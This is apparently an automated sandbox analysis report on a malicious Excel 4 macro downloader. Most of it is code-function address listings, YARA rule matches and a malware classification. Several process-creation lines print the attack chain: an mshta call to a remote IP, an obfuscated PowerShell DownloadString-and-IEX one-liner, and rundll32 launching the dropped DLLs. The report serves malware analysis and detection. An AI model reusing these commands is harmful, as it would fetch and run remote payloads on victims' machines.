                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043109E10_2_0043109E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043129C10_2_0043129C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004304B810_2_004304B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00433D4110_2_00433D41
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043094610_2_00430946
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042BB4B10_2_0042BB4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042194C10_2_0042194C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043275310_2_00432753
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042195010_2_00421950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043A15610_2_0043A156
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00434B5610_2_00434B56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042F15410_2_0042F154
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00440D5B10_2_00440D5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042AB6610_2_0042AB66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00438D7110_2_00438D71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042777B10_2_0042777B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042C30910_2_0042C309
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042BD0F10_2_0042BD0F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042911A10_2_0042911A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042472E10_2_0042472E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00430D3310_2_00430D33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043FF3110_2_0043FF31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00437BCA10_2_00437BCA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043D3C810_2_0043D3C8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042CFCE10_2_0042CFCE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004345CD10_2_004345CD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00432BF610_2_00432BF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043EBFF10_2_0043EBFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00427B8210_2_00427B82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043918610_2_00439186
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043C38F10_2_0043C38F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042F58F10_2_0042F58F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042FD8C10_2_0042FD8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0044199310_2_00441993
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00421F9B10_2_00421F9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00422FA110_2_00422FA1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004341A710_2_004341A7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004399AA10_2_004399AA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043C9A910_2_0043C9A9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00423FB810_2_00423FB8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003600711_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1004105011_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003130F11_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100323E211_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003046011_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1004159211_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003E59F11_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003960C11_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100317E211_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10040B0E11_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031BB611_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10041C5611_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10036CB511_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001CD1611_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10042D2111_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031FC211_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047970011_2_00479700
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00485CF911_2_00485CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048504011_2_00485040
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004770ED11_2_004770ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047608311_2_00476083
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048109E11_2_0048109E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047F15411_2_0047F154
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048A15611_2_0048A156
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047911A11_2_0047911A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048918611_2_00489186
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004841A711_2_004841A7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047E24311_2_0047E243
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048026B11_2_0048026B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048129C11_2_0048129C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047C30911_2_0047C309
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048D3C811_2_0048D3C8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048C38F11_2_0048C38F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048B39111_2_0048B391
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0049146E11_2_0049146E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047B41A11_2_0047B41A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048A42911_2_0048A429
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048542E11_2_0048542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004874DD11_2_004874DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004904DE11_2_004904DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004864F111_2_004864F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004744FA11_2_004744FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048E49811_2_0048E498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004804B811_2_004804B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048351211_2_00483512
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004845CD11_2_004845CD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047F58F11_2_0047F58F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047865011_2_00478650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0049367211_2_00493672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048561F11_2_0048561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048363D11_2_0048363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048275311_2_00482753
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047777B11_2_0047777B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047472E11_2_0047472E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047C85011_2_0047C850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048686411_2_00486864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047E86A11_2_0047E86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0049086711_2_00490867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047B82111_2_0047B821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047283011_2_00472830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048183111_2_00481831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004768DE11_2_004768DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048D8D711_2_0048D8D7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004788F411_2_004788F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047194C11_2_0047194C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048094611_2_00480946
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047195011_2_00471950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047F93D11_2_0047F93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0049199311_2_00491993
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048C9A911_2_0048C9A9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004899AA11_2_004899AA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047CA4311_2_0047CA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00479A7D11_2_00479A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00476A1F11_2_00476A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047BB4B11_2_0047BB4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00491B5411_2_00491B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00484B5611_2_00484B56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047AB6611_2_0047AB66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00487BCA11_2_00487BCA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048EBFF11_2_0048EBFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00482BF611_2_00482BF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00477B8211_2_00477B82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00476C2911_2_00476C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048ACD311_2_0048ACD3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048CC8911_2_0048CC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047EC9B11_2_0047EC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00483D4111_2_00483D41
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00490D5B11_2_00490D5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00488D7111_2_00488D71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047BD0F11_2_0047BD0F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00480D3311_2_00480D33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047FD8C11_2_0047FD8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00478D9511_2_00478D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00476ED611_2_00476ED6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048BE8C11_2_0048BE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048EE9411_2_0048EE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047AE9A11_2_0047AE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048FF3111_2_0048FF31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047CFCE11_2_0047CFCE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00471F9B11_2_00471F9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00472FA111_2_00472FA1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00473FB811_2_00473FB8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002704B812_2_002704B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027BE8C12_2_0027BE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027EE9412_2_0027EE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026EC9B12_2_0026EC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027E49812_2_0027E498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002670ED12_2_002670ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00275CF912_2_00275CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002774DD12_2_002774DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026F93D12_2_0026F93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026970012_2_00269700
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027351212_2_00273512
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00281B5412_2_00281B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00268D9512_2_00268D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027B39112_2_0027B391
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026B82112_2_0026B821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027542E12_2_0027542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027A42912_2_0027A429
                            Source: 3DBB.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                            Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
                            Source: 80_513972285.xls Macro extractor: Sheet name: Macro1
                            Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                            Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0026C67D DeleteService,12_2_0026C67D
                            Source: 80_513972285.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: 80_513972285.xls, type: SAMPLE Matched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
                            Source: C:\Users\user\Desktop\80_513972285.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Users\user\Desktop\80_513972285.xls, type: DROPPED Matched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
                            Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Klovgjl\
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
                            Source: 80_513972285.xls OLE indicator, VBA macros: true
                            Source: 80_513972285.xls.0.dr OLE indicator, VBA macros: true
                            Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@25/9@2/36
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
                            Source: 80_513972285.xls OLE indicator, Workbook stream: true
                            Source: 80_513972285.xls.0.dr OLE indicator, Workbook stream: true
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc,9_2_100125C0
                            Source: 80_513972285.xls ReversingLabs: Detection: 33%
                            Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: PS C:\Users\Albus\Documents>
                            Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c mshta http://91.240.118.168/qqw/aas/se.html
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/qqw/aas/se.html
                            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",ZbJdKnmHcqZ
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",NNzCvXXtcqztdiA
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",NblZwpRsgtK
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",DllRegisterServer
                            Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRDB50.tmp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                            Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                            Source: Window Recorder Window detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                            Source: 3DBB.tmp.0.dr Initial sample: OLE indicators vbamacros = False
                            Source: C:\Windows\System32\mshta.exe Code function: 4_3_033A00C0 push 8B4902BAh; iretd 4_3_033A00C6
                            Source: C:\Windows\System32\mshta.exe Code function: 4_3_033A08C7 push 8B4902BAh; iretd 4_3_033A08CC
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10032B7D push ecx; ret 9_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030DFF push ecx; ret 9_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034114C push ds; ret 9_2_0034114D
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003415F5 push cs; retf 9_2_003415FE
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0042114C push ds; ret 10_2_0042114D
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004215F5 push cs; retf 10_2_004215FE
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10032B7D push ecx; ret 11_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030DFF push ecx; ret 11_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047114C push ds; ret 11_2_0047114D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004715F5 push cs; retf 11_2_004715FE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026114C push ds; ret 12_2_0026114D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002615F5 push cs; retf 12_2_002615FE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033114C push ds; ret 14_2_0033114D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003315F5 push cs; retf 14_2_003315FE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: QWER.dll.6.drStatic PE information: real checksum: 0x8f55d should be: 0x909dc
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\QWER.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda (copy)Jump to dropped file

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Jdywrgg\axwj.zob:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100134F0 IsIconic,9_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,9_2_10018C9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100134F0 IsIconic,11_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,11_2_10018C9A
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exe TID: 308Thread sleep time: -300000s >= -30000sJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_9-32031
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_11-32031
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
